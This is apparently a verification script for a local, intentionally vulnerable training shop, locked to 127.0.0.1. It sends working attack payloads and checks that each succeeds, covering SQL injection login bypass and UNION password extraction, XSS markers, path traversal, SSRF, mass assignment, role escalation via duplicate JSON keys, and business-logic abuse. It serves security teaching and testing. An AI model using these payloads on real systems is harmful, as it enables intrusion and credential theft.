import assert from 'node:assert/strict';
import {fileURLToPath} from 'node:url';
import path from 'node:path';
import http from 'node:http';

export async function verify(base='http://127.0.0.1:3000', internalPort=3001){
  const target=new URL(base);
  if(target.hostname!=='127.0.0.1'||target.protocol!=='http:'||target.pathname!=='/'||target.username||target.password)throw Error('Only a loopback lab URL is allowed');
  let cookie='';let count=0;
  async function request(route,data,auth=true){const r=await fetch(base+route,{method:data?'POST':'GET',headers:{...(data?{'Content-Type':'application/json'}:{}),...(auth&&cookie?{Cookie:cookie}:{})},...(data?{body:JSON.stringify(data)}:{})});const text=await r.text();let value;try{value=JSON.parse(text);}catch{value=text;}return {r,value,text};}
  function check(id,condition){assert.ok(condition,id);console.log('PASS '+id);count++;}
  check('HEALTH',(await request('/api/health')).value.lab==='faultline-local-only');
  const login=await request('/api/login',{email:'alice@lab.test',password:'alice123'});cookie=login.r.headers.get('set-cookie').split(';')[0];
  check('SQL-01 login bypass',(await request('/api/login',{email:"' OR id=3 -- ",password:'wrong'})).value.role==='admin');
  check('SQL-02 search union',(await request('/api/products?q='+encodeURIComponent("' UNION SELECT id,email,password,id,role,5 FROM users -- "))).text.includes('alice@lab.test'));
  check('INJ-03 SQL report expression',(await request('/api/report?field='+encodeURIComponent('(SELECT password FROM users WHERE id=3)'))).value[0].value==='admin123');
  check('INJ-04 SQL predicate filter',(await request('/api/order-search?status='+encodeURIComponent("x' OR 1=1 -- "))).value.some(o=>o.user_id===2));
  check('AUTH-01 predictable session',cookie==='session=lab-session-1');
  check('AUTH-02 plaintext password',login.value.password==='alice123');
  check('AUTH-03 readable session cookie',!login.r.headers.get('set-cookie').toLowerCase().includes('httponly'));
  await request('/api/logout');
  check('AUTH-08 session survives logout',(await request('/api/me')).value.id===1);
  check('ACCESS-01 IDOR',(await request('/api/orders/2')).value.user_id===2);
  check('ACCESS-02 unauthenticated admin',(await request('/api/admin/users',null,false)).value.some(u=>u.role==='admin'));
  check('ACCESS-03 mass assignment',(await request('/api/profile',{role:'admin'})).value.role==='admin');
  await request('/api/profile',{role:'customer'});
  const order=await request('/api/checkout',{total:-100,address:'VERIFY-DEMO'});
  check('BIZ-01 negative price',order.value.total===-100);
  check('ACCESS-04 unauthenticated status update',(await request('/api/admin/orders',{id:order.value.id,status:'shipped'},false)).value.updated===1);
  await request('/api/admin/orders',{id:order.value.id,status:'teleported'});
  check('BIZ-04 invalid state',(await request('/api/orders/'+order.value.id)).value.status==='teleported');
  await request('/api/address?value=CSRF-DEMO');
  check('WEB-04 GET state mutation',(await request('/api/orders/1')).value.address==='CSRF-DEMO');
  const marker='<img src=x onerror="document.body.dataset.labXss=1">';
  check('WEB-01 reflected XSS source',(await request('/search?q='+encodeURIComponent(marker))).text.includes(marker));
  await request('/api/reviews',{body:marker});
  check('WEB-02 stored XSS source',(await request('/api/reviews')).value.some(r=>r.body===marker));
  const appSource=(await request('/app.js')).text;
  check('WEB-03 DOM XSS sink',appSource.includes("target.innerHTML=decodeURIComponent")&&appSource.includes("document.createElement('div')"));
  check('WEB-05 no frame policy',!(await request('/')).r.headers.has('x-frame-options')&&!(await request('/')).r.headers.has('content-security-policy'));
  check('INJ-07 HTML injection',(await request('/search?q='+encodeURIComponent('<h2>LAB-HTML</h2>'))).text.includes('<h2>LAB-HTML</h2>'));
  await request('/api/reviews',{body:'=1+1'});
  check('INJ-05 CSV formula injection',(await request('/api/export/reviews.csv')).text.includes('"=1+1"'));
  await request('/api/log',{message:'normal\nADMIN: forged'});
  check('INJ-06 log newline',(await request('/api/logs')).value.some(x=>x.message.includes('\nADMIN: forged')));
  check('FILE-01 traversal',(await request('/api/download?file=../secret.txt')).text.includes('LAB_ONLY_WAREHOUSE_KEY'));
  const upload=await request('/api/upload',{name:'verify.html',content:marker});
  check('FILE-02 active HTML upload',(await request(upload.value.url)).r.headers.get('content-type').includes('text/html'));
  await request('/api/upload',{name:'overwrite.txt',content:'first'},false);
  await request('/api/upload',{name:'overwrite.txt',content:'second'},false);
  check('FILE-03 anonymous overwrite',(await request('/uploads/overwrite.txt')).text==='second');
  check('FILE-04 upload enumeration',(await request('/api/uploads',null,false)).value.includes('overwrite.txt'));
  check('FILE-05 public backup',(await request('/backup/users.json',null,false)).value.some(x=>x.password==='admin123'));
  await request('/api/upload',{name:'quota1.txt',content:'x'},false);await request('/api/upload',{name:'quota2.txt',content:'x'},false);await request('/api/upload',{name:'quota3.txt',content:'x'},false);
  check('FILE-06 no aggregate quota',(await request('/api/uploads',null,false)).value.filter(x=>x.startsWith('quota')).length===3);
  await request('/api/logout');
  check('FILE-07 upload survives logout',(await request('/uploads/overwrite.txt',null,false)).text==='second');
  check('NET-01 confined SSRF',(await request('/api/import?url='+encodeURIComponent(`http://127.0.0.1:${internalPort}/secret`))).value.key==='LAB_ONLY_INTERNAL_KEY_42');
  check('NET-02 plaintext HTTP transport',target.protocol==='http:');
  check('CONFIG-01 debug secret',(await request('/api/debug')).value.paymentKey==='LAB_FAKE_PAYMENT_KEY');
  check('CONFIG-02 stack disclosure',(await request('/api/error')).value.stack.includes('server.mjs'));
  check('CONFIG-03 missing CSP',!(await request('/')).r.headers.has('content-security-policy'));
  check('CONFIG-04 server fingerprint',(await request('/')).r.headers.get('x-powered-by')?.includes('Faultline'));
  check('CONFIG-05 missing no-store',!(await request('/api/orders')).r.headers.has('cache-control'));
  const email=`verify-${Date.now()}@lab.test`;
  check('AUTH-04 weak password',(await request('/api/register',{email,password:'x',role:'admin'})).r.status===201);
  check('AUTH-07 role registration',(await request('/api/login',{email,password:'x'})).value.role==='admin');
  await request('/api/reset-password',{email,password:'replaced'},false);
  check('AUTH-06 reset without identity proof',(await request('/api/login',{email,password:'replaced'})).r.status===200);
  for(let i=0;i<8;i++)assert.equal((await request('/api/login',{email:'no@lab.test',password:'wrong'})).r.status,401);
  check('AUTH-05 no throttle in short burst',true);
  check('BOUNDARY SSRF external blocked',(await request('/api/import?url=https://example.com')).r.status===403);
  check('BOUNDARY traversal outside fixture blocked',(await request('/api/download?file=../../package.json')).r.status===403);
  const cross=await fetch(base+'/api/health',{headers:{Origin:'https://example.com'}});
  check('BOUNDARY cross origin blocked',cross.status===403);
  const hostStatus=await new Promise((resolve,reject)=>{http.get(base+'/api/health',{headers:{Host:'example.com'}},r=>{r.resume();resolve(r.statusCode);}).on('error',reject);});
  check('BOUNDARY invalid Host blocked',hostStatus===403);
  const redirect=await fetch(base+'/redirect?next='+encodeURIComponent('https://example.com'),{redirect:'manual'});
  check('WEB-06 open redirect',redirect.status===302&&redirect.headers.get('location')==='https://example.com');
  check('WEB-07 unchecked postMessage',(await request('/app.js')).text.includes("addEventListener('message'")&&!(await request('/app.js')).text.includes('event.origin'));
  check('ACCESS-05 anonymous user object',(await request('/api/users/2',null,false)).value.email==='bob@lab.test');
  const reviewRows=(await request('/api/reviews')).value;
  check('ACCESS-06 anonymous review deletion',(await request('/api/reviews/delete',{id:reviewRows[0].id},false)).value.deleted===1);
  check('ACCESS-07 anonymous order export',(await request('/api/admin/export-orders',null,false)).value.some(o=>o.email==='bob@lab.test'));
  const normal=await request('/api/checkout',{total:8900,address:'NORMAL-DEMO',items:[{id:1,name:'Механическая клавиатура',price:8900}]});
  check('SHOP order persisted',(await request('/api/orders/'+normal.value.id)).value.total===8900);
  check('SHOP admin order list',(await request('/api/admin/orders',null,false)).value.some(o=>o.id===normal.value.id));
  const fake=await request('/api/checkout',{total:1,items:[{id:999999,name:'FAKE',price:1}]});
  check('BIZ-02 fake items persisted',JSON.parse((await request('/api/orders/'+fake.value.id)).value.items)[0].id===999999);
  const replay=await request('/api/checkout',{total:1,items:[{id:999999,name:'FAKE',price:1}]});
  check('BIZ-03 replay creates new order',replay.value.id!==fake.value.id);
  const product=(await request('/api/products')).value.find(p=>p.id===1);
  await request('/api/admin/products',{id:1,name:product.name,price:-1});
  check('BIZ-05 negative catalog price',(await request('/api/products')).value.find(p=>p.id===1).price===-1);
  await request('/api/admin/products',{id:1,name:product.name,price:product.price});
  const couponA=await request('/api/coupon',{code:'WELCOME500',subtotal:1000});const couponB=await request('/api/coupon',{code:'WELCOME500',subtotal:1000});
  check('BIZ-06 reusable coupon',couponA.value.total===500&&couponB.value.total===500);
  const stockBefore=(await request('/api/products')).value.find(p=>p.id===1).stock;
  await request('/api/checkout',{total:8900,items:[{id:1,name:'Keyboard',price:8900}]});
  check('BIZ-07 stock unchanged',(await request('/api/products')).value.find(p=>p.id===1).stock===stockBefore);
  check('CLI-01 spoofed forwarded IP',(await request('/api/internal/stats',null,false)).r.status===403&&(await fetch(base+'/api/internal/stats',{headers:{'X-Forwarded-For':'127.0.0.1'}})).status===200);
  const deletePlain=await request('/api/orders/delete',{id:2},false);
  const deleteOverride=await fetch(base+'/api/orders/delete',{method:'POST',headers:{'Content-Type':'application/json','X-HTTP-Method-Override':'DELETE'},body:'{"id":2}'});
  check('CLI-02 method override deletion',deletePlain.r.status===405&&deleteOverride.status===200&&(await deleteOverride.json()).deleted===1);
  const plainEmail=`plain-${Date.now()}@lab.test`;
  const plain=await fetch(base+'/api/register',{method:'POST',headers:{'Content-Type':'text/plain'},body:`email=${plainEmail}&password=x&role=admin&name=Plain`});
  check('CLI-03 content type confusion',plain.status===201);
  const duplicateEmail=`duplicate-${Date.now()}@lab.test`;
  const duplicate=await fetch(base+'/api/register',{method:'POST',headers:{'Content-Type':'application/json'},body:`{"email":"${duplicateEmail}","password":"x","role":"customer","role":"admin"}`});
  const duplicateLogin=await request('/api/login',{email:duplicateEmail,password:'x'},false);
  check('CLI-04 duplicate JSON key',duplicate.status===201&&duplicateLogin.value.role==='admin');
  check('CLI-05 legacy API exposure',(await request('/api/v1/admin/users',null,false)).value.some(u=>u.password==='admin123'));
  const caseEmail=`Case-${Date.now()}@lab.test`, lowerEmail=caseEmail.toLowerCase();
  const lower=await request('/api/register',{email:lowerEmail,password:'one'},false);const upper=await request('/api/register',{email:caseEmail,password:'two'},false);
  check('CLI-06 case-sensitive email identities',lower.r.status===201&&upper.r.status===201);
  const options=await fetch(base+'/api',{method:'OPTIONS'});const optionsBody=await options.json();
  check('CLI-07 verbose OPTIONS',options.status===200&&optionsBody.debugKey==='LAB_OPTIONS_KEY'&&optionsBody.hidden.length===3);
  console.log(`\n${count} checks passed. XSS checks inspect sources; use the browser instructions to verify execution.`);
  return count;
}
if(process.argv[1]&&path.resolve(process.argv[1])===fileURLToPath(import.meta.url))verify().catch(e=>{console.error(e);process.exitCode=1;});

